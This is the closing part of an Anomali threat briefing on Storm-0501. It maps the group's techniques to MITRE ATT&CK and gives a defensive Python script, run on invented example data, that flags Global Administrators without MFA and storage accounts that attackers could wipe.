MITRE ATT&CK: T1059.001 - Command and Scripting Interpreter: PowerShell | T1021.006 - Remote Services: Windows Remote Management | T1003.006 - OS Credential Dumping: DCSync | T1069.003 - Permission Groups Discovery: Cloud Groups | T1526 - Cloud Service Discovery | T1580 - Cloud Infrastructure Discovery | T1548.005 - Abuse Elevation Control Mechanism: Temporary Elevated Cloud Access | T1098.003 - Account Manipulation: Add Office 365 Global Administrator Role | T1484.002 - Domain Policy Modification: Domain Trust Modification | T1530 - Data From Cloud Storage Object | T1567 - Exfiltration Over Web Service | T1490 - Inhibit System Recovery | T1485 - Data Destruction | T1486 - Data Encrypted For Impact
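Two of the conditions Storm-0501 relies on, a Global Administrator without MFA (worse when the account is synced from on-premises AD, which is what the Entra Connect pivot exploits) and storage that can simply be deleted because nothing immutable or locked protects it, are cheap to audit before an intrusion. The script below is an added example, not Microsoft's or Anomali's code. Its data is constructed in the shape of Microsoft Graph results: the attribute names onPremisesSyncEnabled and isMfaRegistered and the role name Global Administrator are real, the values are invented, and the storage-account fields are simplified placeholders for the corresponding Azure settings.

```python
"""Audit Entra ID privileged accounts and storage protections against the
Storm-0501 playbook.

Added example (not Microsoft or Anomali code). Data is constructed; the
storage fields are simplified stand-ins for immutability policy, soft delete
and resource locks.
"""

ROLE_ASSIGNMENTS = [
    {"principal": "alice@contoso.example",    "role": "Global Administrator"},
    {"principal": "sync-svc@contoso.example", "role": "Global Administrator"},
    {"principal": "bob@contoso.example",      "role": "Global Administrator"},
    {"principal": "carol@contoso.example",    "role": "Helpdesk Administrator"},
]

USERS = {
    "alice@contoso.example":    {"onPremisesSyncEnabled": True,  "isMfaRegistered": False},
    "sync-svc@contoso.example": {"onPremisesSyncEnabled": False, "isMfaRegistered": False},
    "bob@contoso.example":      {"onPremisesSyncEnabled": False, "isMfaRegistered": True},
    "carol@contoso.example":    {"onPremisesSyncEnabled": True,  "isMfaRegistered": False},
}

STORAGE_ACCOUNTS = [
    {"name": "stbackupsprod",    "immutability_policy": False, "soft_delete_days": 0,  "resource_lock": False},
    {"name": "stfinancearchive", "immutability_policy": True,  "soft_delete_days": 14, "resource_lock": True},
    {"name": "stlogsarchive",    "immutability_policy": False, "soft_delete_days": 7,  "resource_lock": False},
]


def find_exposed_global_admins(assignments, users):
    """Global Administrators with no MFA registered, worst first. A synced
    account is 'critical' because a compromised Entra Connect server can reach
    it from on-prem; a cloud-only one is 'high'."""
    exposed = []
    for a in assignments:
        if a["role"] != "Global Administrator":
            continue
        u = users.get(a["principal"], {})
        if u.get("isMfaRegistered"):
            continue
        synced = bool(u.get("onPremisesSyncEnabled"))
        exposed.append({"principal": a["principal"], "synced_from_ad": synced,
                        "risk": "critical" if synced else "high"})
    exposed.sort(key=lambda e: e["risk"] != "critical")  # critical entries first
    return exposed


def find_deletable_storage(accounts):
    """Accounts an attacker with Owner rights could wipe outright: no
    immutability policy, no soft delete and no resource lock."""
    return [a["name"] for a in accounts
            if not a["immutability_policy"] and a["soft_delete_days"] == 0 and not a["resource_lock"]]


def find_weakly_protected_storage(accounts):
    """Accounts where only soft delete stands between the data and deletion:
    soft delete buys time but does not stop re-encryption with a new key."""
    return [a["name"] for a in accounts
            if not a["immutability_policy"] and a["soft_delete_days"] > 0 and not a["resource_lock"]]


if __name__ == "__main__":
    print(find_exposed_global_admins(ROLE_ASSIGNMENTS, USERS))
    print(find_deletable_storage(STORAGE_ACCOUNTS))
    print(find_weakly_protected_storage(STORAGE_ACCOUNTS))
```

The ordering matters more than the count: the synced administrator is the account the on-prem pivot hands to the attacker, so it is the one to convert to a cloud-only, MFA-enforced identity first. Soft delete on its own is listed separately because it protects against deletion but not against the Key Vault re-encryption step the report describes.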

Anomali Threat Research

Anomali's Threat Research team continually tracks security threats to identify when new, highly critical security threats emerge. The Anomali Threat Research team's briefings discuss current threats and risks like botnets, data breaches, misconfigurations, ransomware, threat groups, and various vulnerabilities. The team also creates free and premium threat intelligence feeds for Anomali's industry-leading Threat Intelligence Platform, ThreatStream.
